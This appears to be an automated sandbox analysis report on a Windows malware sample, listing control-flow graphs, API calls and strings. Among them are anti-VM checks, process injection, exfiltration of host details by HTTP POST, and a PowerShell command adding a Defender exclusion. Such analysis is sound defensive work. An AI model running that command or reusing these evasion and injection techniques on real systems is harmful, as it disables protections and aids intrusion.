                    • Not Executed
                    control_flow_graph 116 d11300-d11350 GetModuleHandleA VirtualAlloc 117 d11352-d11354 116->117 118 d11359-d11387 call d171a0 116->118 119 d116aa-d116b7 call d14766 117->119 123 d11395-d113a2 118->123 125 d113e1-d113f9 123->125 126 d113a4-d113df call d171a0 123->126 128 d114ef-d11529 call d111f0 VirtualProtect 125->128 129 d113ff-d11406 125->129 126->123 136 d11537-d11544 128->136 129->128 132 d1140c-d11417 129->132 135 d11422-d11429 132->135 135->128 137 d1142f-d11463 GetModuleHandleA GetProcAddress LoadLibraryA 135->137 138 d1154a-d11572 136->138 139 d1164d-d11666 136->139 140 d11469-d11486 137->140 141 d114ea 137->141 145 d11595-d115af 138->145 146 d11574-d11593 VirtualFree 138->146 143 d116a7 139->143 144 d11668-d1167c 139->144 147 d11488-d1148b 140->147 148 d1148e 140->148 141->135 143->119 149 d11687-d1168b 144->149 151 d115b1-d115b8 145->151 152 d115ba 145->152 150 d1152b-d11533 146->150 147->148 153 d114a2-d114a8 148->153 149->143 156 d1168d-d11693 149->156 150->136 154 d115c1-d115c9 151->154 152->154 153->141 155 d114aa-d114b5 153->155 157 d115d4 154->157 158 d115cb-d115d2 154->158 159 d114b7-d114c4 155->159 160 d114c6-d114d2 155->160 156->143 161 d11695-d116a5 156->161 162 d115db-d115e4 157->162 158->162 163 d114d5-d114e8 GetProcAddress 159->163 160->163 161->149 165 d115e6-d115ed 162->165 166 d115ef 162->166 167 d11490-d1149f 163->167 169 d115f6-d11618 165->169 166->169 167->153 170 d11626-d11647 VirtualProtect 169->170 171 d1161a-d11623 169->171 170->139 171->170
                    APIs
                    • GetModuleHandleA.KERNEL32(kernel32), ref: 00D1132A
                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00D11343
                    • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA), ref: 00D11439
                    • GetProcAddress.KERNEL32(00000000), ref: 00D11440
                    • LoadLibraryA.KERNELBASE(?), ref: 00D11459
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HandleModule$AddressAllocLibraryLoadProcVirtual
                    • String ID: LoadLibraryA$kernel32
                    • API String ID: 3393750808-970291620
                    • Opcode ID: 3ba175d04a56f20a998998f20e04ea1438df5283fd10f9289b3dac538007e990
                    • Instruction ID: ce94d4356af95896a48c352e525e45e67b8f71c17836ad8e2b892aa268f5a4ac
                    • Opcode Fuzzy Hash: 3ba175d04a56f20a998998f20e04ea1438df5283fd10f9289b3dac538007e990
                    • Instruction Fuzzy Hash: B6D10774E00219EFDB18CF98E890AFDB7B6FF88304F148159E516AB395D735A981CB60

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 184 bd9240-bd9257 GetUserDefaultLangID 185 bd925d-bd9265 184->185 186 bd92ec-bd92ee ExitProcess 184->186 185->186 187 bd926b-bd9273 185->187 187->186 188 bd9275-bd927d 187->188 188->186 189 bd927f-bd9287 188->189 189->186 190 bd9289-bd9291 189->190 190->186 191 bd9293-bd929b 190->191 191->186 192 bd929d-bd92a5 191->192 192->186 193 bd92a7-bd92af 192->193 193->186 194 bd92b1-bd92b9 193->194 194->186 195 bd92bb-bd92c3 194->195 195->186 196 bd92c5 call bd89f0 195->196 198 bd92ca-bd92cc 196->198 198->186 199 bd92ce-bd92e7 call bd8710 call bd72e0 call bd93a0 call bd7920 call bd8900 198->199 199->186
                    APIs
                    • GetUserDefaultLangID.KERNEL32 ref: 00BD9246
                    • ExitProcess.KERNEL32 ref: 00BD92EE
                      • Part of subcall function 00BD89F0: EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 00BD8A2E
                      • Part of subcall function 00BD89F0: StrStrIW.KERNELBASE(?,Hyper-V), ref: 00BD8A4D
                      • Part of subcall function 00BD89F0: StrStrIW.SHLWAPI(?,VMWare), ref: 00BD8A63
                      • Part of subcall function 00BD89F0: StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 00BD8A79
                      • Part of subcall function 00BD89F0: StrStrIW.SHLWAPI(?,Red Hat), ref: 00BD8A8F
                      • Part of subcall function 00BD89F0: EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 00BD8AA4
                      • Part of subcall function 00BD89F0: GetModuleHandleA.KERNEL32(kernel32), ref: 00BD8AAF
                      • Part of subcall function 00BD89F0: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BD8AC3
                      • Part of subcall function 00BD89F0: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BD8ACD
                      • Part of subcall function 00BD89F0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 00BD8AF9
                      • Part of subcall function 00BD89F0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 00BD8B0C
                      • Part of subcall function 00BD89F0: GetFileAttributesW.KERNELBASE(?), ref: 00BD8B1B
                      • Part of subcall function 00BD89F0: GetFileAttributesW.KERNEL32(?), ref: 00BD8B2D
                      • Part of subcall function 00BD8710: InitializeCriticalSection.KERNEL32(00BDA090), ref: 00BD8732
                      • Part of subcall function 00BD8710: GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00BD875F
                      • Part of subcall function 00BD8710: StringFromGUID2.OLE32(?,?,00000080), ref: 00BD87B8
                      • Part of subcall function 00BD8710: wsprintfA.USER32 ref: 00BD87CF
                      • Part of subcall function 00BD8710: CreateMutexW.KERNEL32(00000000,00000001,?), ref: 00BD87E3
                      • Part of subcall function 00BD8710: GetLastError.KERNEL32 ref: 00BD87EE
                      • Part of subcall function 00BD8710: WSAStartup.WS2_32(00000202,?), ref: 00BD882C
                      • Part of subcall function 00BD8710: CryptAcquireContextA.ADVAPI32(00BDA4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 00BD8845
                      • Part of subcall function 00BD8710: CryptAcquireContextA.ADVAPI32(00BDA4FC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 00BD8861
                      • Part of subcall function 00BD72E0: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104,?,?,?,00BD92D8), ref: 00BD7306
                      • Part of subcall function 00BD72E0: ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104,?,?,?,00BD92D8), ref: 00BD7319
                      • Part of subcall function 00BD72E0: lstrlenW.KERNEL32(?,?,?,?,00BD92D8), ref: 00BD7322
                      • Part of subcall function 00BD72E0: ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104,?,?,?,00BD92D8), ref: 00BD733D
                      • Part of subcall function 00BD72E0: GetSystemWow64DirectoryW.KERNEL32(?,00000104,?,?,?,00BD92D8), ref: 00BD734B
                      • Part of subcall function 00BD72E0: GetLastError.KERNEL32(?,?,?,00BD92D8), ref: 00BD7355
                      • Part of subcall function 00BD72E0: wnsprintfW.SHLWAPI ref: 00BD7377
                      • Part of subcall function 00BD72E0: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00BD738F
                      • Part of subcall function 00BD72E0: wnsprintfW.SHLWAPI ref: 00BD73A9
                      • Part of subcall function 00BD72E0: SetFileAttributesW.KERNEL32(?,00000006), ref: 00BD73C5
                      • Part of subcall function 00BD72E0: lstrcpyW.KERNEL32(?,/c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"), ref: 00BD73D7
                      • Part of subcall function 00BD72E0: GetUserNameW.ADVAPI32(?,?), ref: 00BD73F6
                      • Part of subcall function 00BD72E0: NetUserGetInfo.NETAPI32(00000000,?,00000001,00000000), ref: 00BD740B
                      • Part of subcall function 00BD72E0: NetApiBufferFree.NETAPI32(00000000), ref: 00BD7420
                      • Part of subcall function 00BD72E0: CoInitializeEx.OLE32(00000000,?), ref: 00BD7437
                      • Part of subcall function 00BD72E0: lstrlenW.KERNEL32({3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 00BD7451
                      • Part of subcall function 00BD93A0: CryptGenRandom.ADVAPI32(00000020,?), ref: 00BD93B8
                      • Part of subcall function 00BD93A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD9415
                      • Part of subcall function 00BD93A0: HeapFree.KERNEL32(00000000), ref: 00BD941C
                      • Part of subcall function 00BD93A0: wsprintfA.USER32 ref: 00BD944F
                      • Part of subcall function 00BD93A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD9488
                      • Part of subcall function 00BD93A0: HeapFree.KERNEL32(00000000), ref: 00BD948B
                      • Part of subcall function 00BD93A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD9490
                      • Part of subcall function 00BD93A0: HeapFree.KERNEL32(00000000), ref: 00BD9493
                      • Part of subcall function 00BD7920: LsaOpenPolicy.ADVAPI32(00000000,00BDA060,00000001,?), ref: 00BD795C
                      • Part of subcall function 00BD7920: LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 00BD7975
                      • Part of subcall function 00BD7920: GetProcessHeap.KERNEL32(00000008,?), ref: 00BD7991
                      • Part of subcall function 00BD7920: HeapAlloc.KERNEL32(00000000), ref: 00BD7994
                      • Part of subcall function 00BD7920: LsaFreeMemory.ADVAPI32(?), ref: 00BD79DB
                      • Part of subcall function 00BD7920: LsaClose.ADVAPI32(?), ref: 00BD79E4
                      • Part of subcall function 00BD7920: GetComputerNameW.KERNEL32(?,?), ref: 00BD7A00
                      • Part of subcall function 00BD7920: GetUserNameW.ADVAPI32(?,00000101), ref: 00BD7A11
                      • Part of subcall function 00BD7920: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00BD7A32
                      • Part of subcall function 00BD8900: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 00BD8921
                      • Part of subcall function 00BD8900: ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 00BD8934
                      • Part of subcall function 00BD8900: ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 00BD8947
                      • Part of subcall function 00BD8900: GetFileAttributesW.KERNEL32(?), ref: 00BD896D
                      • Part of subcall function 00BD8900: lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 00BD899D
                      • Part of subcall function 00BD8900: wnsprintfW.SHLWAPI ref: 00BD89C0
                      • Part of subcall function 00BD8900: ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 00BD89E2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: EnvironmentExpandStrings$Heap$FreeProcess$AttributesFileUser$CryptNamewnsprintf$AcquireAddressContextDevicesDisplayEnumErrorInformationInitializeLastPolicyProclstrcpylstrlenwsprintf$AllocBufferByteCharCloseComputerCreateCriticalDefaultDirectoryExecuteExitFromHandleInfoLangMemoryModuleMultiMutexOpenQueryRandomSectionShellStartupStringSystemVolumeWideWow64
                    • String ID:
                    • API String ID: 1026145915-0
                    • Opcode ID: ec4ef6b50f4303f4b6b980021cff946776d6c2af064be468172ac68bbee58fb9
                    • Instruction ID: 03f47155000c0c28fb34539f95ac1250a0a30b76fe8f92a2e64b65c73bded6d2
                    • Opcode Fuzzy Hash: ec4ef6b50f4303f4b6b980021cff946776d6c2af064be468172ac68bbee58fb9
                    • Instruction Fuzzy Hash: 9A012B5C60610266DE38F5D944A53B4B1CADF81321FD851AB6BD647FC5BD081E83825F

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 210 d11710-d1175a call d11110 * 2 215 d11760-d11764 210->215 216 d11847-d11860 call d17760 call d14766 210->216 215->216 217 d1176a-d1176e 215->217 217->216 219 d11774-d11778 217->219 219->216 221 d1177e-d117a3 call d17ae8 219->221 226 d117ae-d117b4 221->226 227 d117b6-d117c8 226->227 228 d117ca-d11833 call d116c0 call d11300 GetPEB GetUserDefaultLCID call d17760 226->228 227->226 235 d11838-d11844 call d17760 228->235 235->216
                    APIs
                      • Part of subcall function 00D11110: GetModuleHandleA.KERNEL32(kernel32), ref: 00D1111B
                      • Part of subcall function 00D11110: GetModuleHandleW.KERNEL32(00000000), ref: 00D11162
                    • GetUserDefaultLCID.KERNELBASE ref: 00D1182C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HandleModule$DefaultUser
                    • String ID:
                    • API String ID: 3008646163-0
                    • Opcode ID: 2900884e824874af4ac5aca7dc89f02db9d6c0994840a8cd38df721c82e5c995
                    • Instruction ID: a48a4d36f349d73448d2f1a0426798b61b47a93bf0712c692d9d6f566ba017ea
                    • Opcode Fuzzy Hash: 2900884e824874af4ac5aca7dc89f02db9d6c0994840a8cd38df721c82e5c995
                    • Instruction Fuzzy Hash: 52410AB9D00209AFDB04DFA8E485AEEB7F5FF48304F148559E515A7341DB34AA84CFA1

                    Control-flow Graph

                    APIs
                    • LPtoDP.GDI32(00000000,0056AA94,0538CD39), ref: 00D13C91
                    • GetLastError.KERNEL32 ref: 00D13C9B
                    • ExitProcess.KERNEL32 ref: 00D13CA8
                    • BuildCommDCBAndTimeoutsA.KERNEL32(eruigoreh ertoerh634643,00000000,00000000), ref: 00D13CB8
                    • GetCurrentProcess.KERNEL32(00000000), ref: 00D13CC4
                    • TerminateProcess.KERNEL32(00000000), ref: 00D13CCB
                    Strings
                    • eruigoreh ertoerh634643, xrefs: 00D13CB3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Process$BuildCommCurrentErrorExitLastTerminateTimeouts
                    • String ID: eruigoreh ertoerh634643
                    • API String ID: 3772419538-1078997068
                    • Opcode ID: 6d14d3b8939c8567799a536713d880f087071333bfa2e63bc83ffad4df1999be
                    • Instruction ID: 057f80f8e0a1905ef5297e9959ea647e4d2511c21ed92e280f08e426cc8f7d0f
                    • Opcode Fuzzy Hash: 6d14d3b8939c8567799a536713d880f087071333bfa2e63bc83ffad4df1999be
                    • Instruction Fuzzy Hash: BB016D70A40308BBD720EFB1AE0AB9E7BB4EB18B01F104415F506E6290EF749A45DB71

                    Non-executed Functions

                    Control-flow Graph

                    APIs
                    • GetModuleHandleW.KERNEL32(ntdll), ref: 00BD5FED
                    • GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 00BD6001
                    • GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 00BD600C
                    • GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 00BD6017
                    • GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 00BD6022
                    • GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00BD602D
                    • GetTempPathW.KERNEL32(000000F6,?), ref: 00BD6046
                      • Part of subcall function 00BD26B0: GetTickCount.KERNEL32 ref: 00BD26B2
                    • wnsprintfW.SHLWAPI ref: 00BD6081
                    • PathCombineW.SHLWAPI(?,?,?), ref: 00BD609B
                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 00BD60C2
                    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00BD60E6
                    • SetEndOfFile.KERNEL32(00000000), ref: 00BD60E9
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD60F6
                    • wnsprintfW.SHLWAPI ref: 00BD6114
                    • RtlInitUnicodeString.NTDLL(?,?), ref: 00BD612A
                    • RtlInitUnicodeString.NTDLL(?,?), ref: 00BD6137
                    • GetCurrentProcess.KERNEL32(00000004,00000000,00000000,00000000,00000000), ref: 00BD6176
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD61C5
                    • WriteFile.KERNEL32(00000000,00000000,00000400,00000000,00000000), ref: 00BD620F
                    • FlushFileBuffers.KERNEL32(00000000), ref: 00BD6217
                    • SetEndOfFile.KERNEL32(00000000), ref: 00BD621E
                    • NtQueryInformationProcess.NTDLL ref: 00BD6233
                    • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 00BD625B
                    • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 00BD62B2
                    • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00BD62EE
                    • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 00BD62FC
                    • NtClose.NTDLL ref: 00BD6335
                    • NtClose.NTDLL ref: 00BD6346
                    • NtClose.NTDLL ref: 00BD6350
                    • CloseHandle.KERNEL32(00000000), ref: 00BD6353
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AddressProcProcess$CloseWrite$Memory$HandleInitPathPointerStringUnicodewnsprintf$AllocBuffersCombineCountCreateCurrentFlushInformationModuleQueryReadTempTickVirtual
                    • String ID: "%s"$%08x%s$.exe$NtCreateProcessEx$NtCreateSection$NtCreateThreadEx$RtlCreateProcessParametersEx$RtlDestroyProcessParameters$ntdll
                    • API String ID: 3548791621-756185880
                    • Opcode ID: 5482271ca9973384a83eff15af9e15fc615c676c84066892b3199eab6ac5de15
                    • Instruction ID: c1beede4e7eca7061b033e33235df967e765822645de25f42ad7c476c039a22f
                    • Opcode Fuzzy Hash: 5482271ca9973384a83eff15af9e15fc615c676c84066892b3199eab6ac5de15
                    • Instruction Fuzzy Hash: 42B12D71A40219BBEB10DBA4CC49FAEBBBCFB04710F1444A6F605F7290EB74A9448F54

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 526 bd6830-bd6878 ObtainUserAgentString MultiByteToWideChar 527 bd687a-bd687f 526->527 528 bd6881-bd689d GetProcessHeap HeapAlloc 526->528 529 bd68b9-bd68c5 call bd6670 527->529 530 bd689f-bd68b5 MultiByteToWideChar 528->530 531 bd68b7 528->531 534 bd68c7-bd68e5 InternetOpenW 529->534 530->529 531->529 535 bd68eb-bd6909 534->535 536 bd6a67-bd6a6b 534->536 537 bd6910-bd6925 InternetSetOptionW 535->537 538 bd6a6d-bd6a72 536->538 539 bd6a77-bd6a88 536->539 537->537 540 bd6927-bd6945 InternetConnectW 537->540 538->534 541 bd6a8a-bd6a90 GetProcessHeap HeapFree 539->541 542 bd6a92-bd6a97 539->542 543 bd6a59-bd6a62 InternetCloseHandle 540->543 544 bd694b-bd697b HttpOpenRequestW 540->544 541->542 545 bd6a99-bd6a9f GetProcessHeap HeapFree 542->545 546 bd6aa1-bd6aa6 542->546 543->539 549 bd6a64 543->549 547 bd6a4d 544->547 548 bd6981-bd69a2 InternetQueryOptionW 544->548 545->546 550 bd6aa8-bd6aae GetProcessHeap HeapFree 546->550 551 bd6ab0-bd6ab8 546->551 552 bd6a53-bd6a56 InternetCloseHandle 547->552 553 bd69ba-bd69d0 HttpSendRequestW 548->553 554 bd69a4-bd69b4 InternetSetOptionW 548->554 549->536 550->551 552->543 555 bd6a42-bd6a4b InternetCloseHandle 553->555 556 bd69d2 553->556 554->553 555->552 557 bd69d4-bd69ef InternetQueryDataAvailable 556->557 558 bd69f1-bd69f6 557->558 559 bd6a32-bd6a34 557->559 560 bd6a09-bd6a13 GetProcessHeap HeapReAlloc 558->560 561 bd69f8-bd6a07 GetProcessHeap HeapAlloc 558->561 559->557 562 bd6a36-bd6a3b 559->562 563 bd6a19-bd6a30 InternetReadFile 560->563 561->563 564 bd6a3d 562->564 565 bd6a3f 562->565 563->559 564->565 565->555
                    APIs
                    • ObtainUserAgentString.URLMON(00000000,?,00BD9478), ref: 00BD6852
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00BD6872
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BD688B
                    • HeapAlloc.KERNEL32(00000000), ref: 00BD6892
                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00BD68B3
                    • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BD68D8
                    • InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 00BD691B
                    • InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BD6938
                    • HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 00BD6971
                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BD699A
                    • InternetSetOptionW.WININET(00000000,0000001F,00003180,00000004), ref: 00BD69B4
                    • HttpSendRequestW.WININET(00000000,Content-Type: application/octet-streamContent-Encoding: binary,000000FF,?,0000EA60), ref: 00BD69C8
                    • InternetQueryDataAvailable.WININET(00000000,00000000,00000000,00000000), ref: 00BD69E4
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00BD69FA
                    • HeapAlloc.KERNEL32(00000000), ref: 00BD6A01
                    • GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 00BD6A0C
                    • HeapReAlloc.KERNEL32(00000000), ref: 00BD6A13
                    • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 00BD6A27
                    • InternetCloseHandle.WININET(00000000), ref: 00BD6A49
                    • InternetCloseHandle.WININET(00000000), ref: 00BD6A54
                    • InternetCloseHandle.WININET(00000000), ref: 00BD6A5A
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BD6A8D
                    • HeapFree.KERNEL32(00000000), ref: 00BD6A90
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BD6A9C
                    • HeapFree.KERNEL32(00000000), ref: 00BD6A9F
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BD6AAB
                    • HeapFree.KERNEL32(00000000), ref: 00BD6AAE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Internet$Process$AllocCloseFreeHandleOption$ByteCharHttpMultiOpenQueryRequestWide$AgentAvailableConnectDataFileObtainReadSendStringUser
                    • String ID: Content-Type: application/octet-streamContent-Encoding: binary$POST$`
                    • API String ID: 2744214989-3343008755
                    • Opcode ID: 7e09efd76dc77dd270693951a5d0147e7ac3c7489c1add6e5e2899702edc868e
                    • Instruction ID: 4f718a3d813d77888eea0cabd4e0b05a62a9850da4953856c9da80384914a5b7
                    • Opcode Fuzzy Hash: 7e09efd76dc77dd270693951a5d0147e7ac3c7489c1add6e5e2899702edc868e
                    • Instruction Fuzzy Hash: 4A716275A41219BBEB109FA4CC95FAEFBBCEF08700F15405BFA15B7290EB7499008B64

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 566 bd7920-bd796a GetPEB LsaOpenPolicy 567 bd796c-bd797d LsaQueryInformationPolicy 566->567 568 bd79ea-bd7a39 GetComputerNameW GetUserNameW WideCharToMultiByte 566->568 571 bd797f-bd7985 567->571 572 bd79e1-bd79e4 LsaClose 567->572 569 bd7a3b-bd7a42 568->569 570 bd7a44-bd7a58 GetProcessHeap HeapAlloc 568->570 575 bd7a7f-bd7a9e WideCharToMultiByte 569->575 576 bd7a79 570->576 577 bd7a5a-bd7a77 WideCharToMultiByte 570->577 573 bd79da-bd79db LsaFreeMemory 571->573 574 bd7987-bd799e GetProcessHeap HeapAlloc 571->574 572->568 573->572 580 bd79d7 574->580 581 bd79a0-bd79ae 574->581 578 bd7aa9-bd7abb GetProcessHeap HeapAlloc 575->578 579 bd7aa0-bd7aa7 575->579 576->575 577->575 582 bd7ad7-bd7af5 578->582 583 bd7abd-bd7ad5 WideCharToMultiByte 578->583 579->582 580->573 584 bd79d1-bd79d3 581->584 585 bd79b0-bd79b7 581->585 588 bd7b0b-bd7b0d 582->588 589 bd7af7 582->589 583->582 584->580 586 bd79b9 585->586 587 bd79cb 585->587 590 bd79c0-bd79c9 586->590 587->584 592 bd7b10-bd7b28 call bd26b0 588->592 591 bd7b00-bd7b09 589->591 590->587 590->590 591->588 591->591 595 bd7b2a-bd7b8c call bd7710 wsprintfA * 2 592->595 598 bd7b8e 595->598 599 bd7ba1-bd7bd5 call bd6830 595->599 601 bd7b90-bd7b9f 598->601 603 bd7bdf-bd7be4 599->603 604 bd7bd7-bd7bdd GetProcessHeap HeapFree 599->604 601->599 601->601 605 bd7bee-bd7bf3 603->605 606 bd7be6-bd7bec GetProcessHeap HeapFree 603->606 604->603 607 bd7bfd-bd7bff 605->607 608 bd7bf5-bd7bfb GetProcessHeap HeapFree 605->608 606->605 609 bd7c09-bd7c0f 607->609 610 bd7c01-bd7c07 GetProcessHeap HeapFree 607->610 608->607 610->609
                    APIs
                    • LsaOpenPolicy.ADVAPI32(00000000,00BDA060,00000001,?), ref: 00BD795C
                    • LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 00BD7975
                    • GetProcessHeap.KERNEL32(00000008,?), ref: 00BD7991
                    • HeapAlloc.KERNEL32(00000000), ref: 00BD7994
                    • LsaFreeMemory.ADVAPI32(?), ref: 00BD79DB
                    • LsaClose.ADVAPI32(?), ref: 00BD79E4
                    • GetComputerNameW.KERNEL32(?,?), ref: 00BD7A00
                    • GetUserNameW.ADVAPI32(?,00000101), ref: 00BD7A11
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00BD7A32
                    • GetProcessHeap.KERNEL32(00000008,00000001), ref: 00BD7A48
                    • HeapAlloc.KERNEL32(00000000), ref: 00BD7A4B
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00BD7A75
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00BD7A97
                    • GetProcessHeap.KERNEL32(00000008,00000001), ref: 00BD7AAD
                    • HeapAlloc.KERNEL32(00000000), ref: 00BD7AB0
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00BD7AD5
                    • wsprintfA.USER32 ref: 00BD7B56
                    • wsprintfA.USER32 ref: 00BD7B81
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BD7BDA
                    • HeapFree.KERNEL32(00000000), ref: 00BD7BDD
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BD7BE9
                    • HeapFree.KERNEL32(00000000), ref: 00BD7BEC
